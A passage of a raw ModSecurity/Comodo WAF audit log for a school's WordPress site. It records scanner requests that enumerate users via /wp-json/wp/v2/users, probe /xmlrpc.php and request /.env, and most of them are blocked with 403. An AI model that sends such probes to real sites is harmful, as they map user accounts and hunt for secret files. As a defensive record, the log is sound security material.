REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669108439696 2843 (- - -) Stopwatch2: 1746669108439696 2843; combined=1361, p1=441, p2=891, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acc1231b-Z-- --2b00104d-A-- [08/May/2025:08:51:52 +0700] aBwOOKcs1DvJ_HgMHE_xwQAAABY 103.236.140.4 42576 103.236.140.4 8181 --2b00104d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b00104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b00104d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669112169523 2898 (- - -) Stopwatch2: 1746669112169523 2898; combined=1310, p1=450, p2=825, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b00104d-Z-- --8a333452-A-- [08/May/2025:08:51:57 +0700] aBwOPY4K347NtBcwXKwFmAAAAIw 103.236.140.4 42582 103.236.140.4 8181 --8a333452-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a333452-C-- demo.sayHello --8a333452-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a333452-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669117452014 5123 (- - -) Stopwatch2: 1746669117452014 5123; combined=3877, p1=520, p2=3142, p3=23, p4=26, p5=96, sr=123, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a333452-Z-- --81c5845e-A-- [08/May/2025:08:51:58 +0700] aBwOPsP9GxxPAbCroFbMwAAAAFU 103.236.140.4 42586 103.236.140.4 8181 --81c5845e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81c5845e-C-- demo.sayHello --81c5845e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c5845e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669118895529 4812 (- - -) Stopwatch2: 1746669118895529 4812; combined=3753, p1=449, p2=3053, p3=23, p4=27, p5=120, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c5845e-Z-- --68c4ea57-A-- [08/May/2025:08:52:16 +0700] aBwOUCs5rYyn3jlLjjK_BwAAAMU 103.236.140.4 42594 103.236.140.4 8181 --68c4ea57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68c4ea57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c4ea57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669136289361 14888 (- - -) Stopwatch2: 1746669136289361 14888; combined=26391, p1=342, p2=641, p3=0, p4=0, p5=12718, sr=66, sw=0, l=0, gc=12690 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c4ea57-Z-- --c502cc33-A-- [08/May/2025:08:52:20 +0700] aBwOVCs5rYyn3jlLjjK_CQAAAMs 103.236.140.4 42598 103.236.140.4 8181 --c502cc33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c502cc33-C-- demo.sayHello --c502cc33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c502cc33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669140887802 5241 (- - -) Stopwatch2: 1746669140887802 5241; combined=3606, p1=496, p2=2928, p3=33, p4=36, p5=69, sr=57, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c502cc33-Z-- --9cf15b47-A-- [08/May/2025:08:57:37 +0700] aBwPkSs5rYyn3jlLjjK_DAAAAMo 103.236.140.4 42618 103.236.140.4 8181 --9cf15b47-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cf15b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cf15b47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669457267302 3190 (- - -) Stopwatch2: 1746669457267302 3190; combined=1392, p1=469, p2=891, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cf15b47-Z-- --38f1315f-A-- [08/May/2025:08:57:42 +0700] aBwPlis5rYyn3jlLjjK_DgAAAM8 103.236.140.4 42622 103.236.140.4 8181 --38f1315f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --38f1315f-C-- demo.sayHello --38f1315f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --38f1315f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669462809348 4675 (- - -) Stopwatch2: 1746669462809348 4675; combined=3625, p1=434, p2=2989, p3=24, p4=26, p5=90, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38f1315f-Z-- --ec75031c-A-- [08/May/2025:09:09:47 +0700] aBwSa44K347NtBcwXKwFoQAAAIc 103.236.140.4 42730 103.236.140.4 8181 --ec75031c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.204.210.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.204.210.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec75031c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec75031c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746670187580298 2423 (- - -) Stopwatch2: 1746670187580298 2423; combined=1106, p1=380, p2=697, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec75031c-Z-- --62570014-A-- [08/May/2025:09:10:35 +0700] aBwSm8P9GxxPAbCroFbM1QAAAEo 103.236.140.4 42748 103.236.140.4 8181 --62570014-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.56.0.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.56.0.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62570014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62570014-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746670235000340 2716 (- - -) Stopwatch2: 1746670235000340 2716; combined=1443, p1=452, p2=955, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62570014-Z-- --5e04dc18-A-- [08/May/2025:09:11:52 +0700] aBwS6Cs5rYyn3jlLjjK_FQAAAMA 103.236.140.4 42756 103.236.140.4 8181 --5e04dc18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --5e04dc18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e04dc18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746670312242710 778 (- - -) Stopwatch2: 1746670312242710 778; combined=315, p1=275, p2=0, p3=0, p4=0, p5=40, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e04dc18-Z-- --8f514b44-A-- [08/May/2025:09:12:32 +0700] aBwTEMP9GxxPAbCroFbM1gAAAEM 103.236.140.4 42762 103.236.140.4 8181 --8f514b44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --8f514b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f514b44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746670352222905 845 (- - -) Stopwatch2: 1746670352222905 845; combined=355, p1=313, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f514b44-Z-- --5b34d017-A-- [08/May/2025:09:32:29 +0700] aBwXvY4K347NtBcwXKwFrgAAAIM 103.236.140.4 42846 103.236.140.4 8181 --5b34d017-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b34d017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b34d017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746671549039819 3271 (- - -) Stopwatch2: 1746671549039819 3271; combined=1448, p1=507, p2=909, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b34d017-Z-- --2e3b7c5f-A-- [08/May/2025:09:32:36 +0700] aBwXxCs5rYyn3jlLjjK_IQAAAMw 103.236.140.4 42850 103.236.140.4 8181 --2e3b7c5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e3b7c5f-C-- demo.sayHello --2e3b7c5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3b7c5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746671556188584 5989 (- - -) Stopwatch2: 1746671556188584 5989; combined=4299, p1=553, p2=3472, p3=35, p4=35, p5=116, sr=75, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3b7c5f-Z-- --0891cf42-A-- [08/May/2025:09:35:24 +0700] aBwYbKcs1DvJ_HgMHE_xzAAAAAo 103.236.140.4 42868 103.236.140.4 8181 --0891cf42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0891cf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0891cf42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746671724826803 2702 (- - -) Stopwatch2: 1746671724826803 2702; combined=1081, p1=381, p2=677, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0891cf42-Z-- --19a78e6e-A-- [08/May/2025:09:35:30 +0700] aBwYcqcs1DvJ_HgMHE_xzgAAABA 103.236.140.4 42872 103.236.140.4 8181 --19a78e6e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19a78e6e-C-- demo.sayHello --19a78e6e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a78e6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746671730644213 5475 (- - -) Stopwatch2: 1746671730644213 5475; combined=4128, p1=501, p2=3299, p3=41, p4=32, p5=172, sr=71, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a78e6e-Z-- --760ca14b-A-- [08/May/2025:09:43:51 +0700] aBwaZ6cs1DvJ_HgMHE_x2gAAAAo 103.236.140.4 42932 103.236.140.4 8181 --760ca14b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --760ca14b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --760ca14b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672231633560 3254 (- - -) Stopwatch2: 1746672231633560 3254; combined=1418, p1=474, p2=911, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --760ca14b-Z-- --3b291045-A-- [08/May/2025:09:53:20 +0700] aBwcoMP9GxxPAbCroFbM6gAAAEc 103.236.140.4 42966 103.236.140.4 8181 --3b291045-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b291045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b291045-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO 